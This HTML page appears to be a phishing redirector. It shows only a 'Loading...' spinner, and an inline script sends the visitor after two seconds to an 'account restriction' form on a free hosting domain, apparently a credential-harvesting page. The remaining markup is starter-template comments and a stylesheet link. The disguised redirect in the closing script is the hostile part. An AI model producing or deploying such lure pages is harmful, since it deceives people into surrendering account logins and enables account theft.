<!DOCTYPE html>
<html lang="en">
  <head>
    <!-- 
      This is an HTML comment
      You can write text in a comment and the content won't be visible in the page
    -->

    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    

    <!--
      This is the page head - it contains info the browser uses
      Like the title, which appears on the browser tab but not inside the page
      Further down you'll see the content that displays in the page
    -->
    <title>Loading..</title>

    <!-- The website stylesheet -->

   
    <link
      rel="stylesheet"
      href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"
      integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
      crossorigin="anonymous"
    />

    <!-- The website JavaScript file -->
    <script src="/script.js" defer></script>
 

    <style>
      .container {
        display: flex;
        justify-content: center;
       margin-top: 20px;
      }
    </style>
  </head>
  <body>
    <div class="container">
       
          <button class="btn btn-primary" type="button" disabled>
            <span class="spinner-grow spinner-grow-sm" role="status" aria-hidden="true"></span>
            Loading...
          </button>
    </div>

    <script>
      window.onload = setTimeout(() => {
        window.location.href = "https://form-submit-account-restriction.submit11.repl.co/"
      }, 2000);
    </script>
    
  </body>
</html>
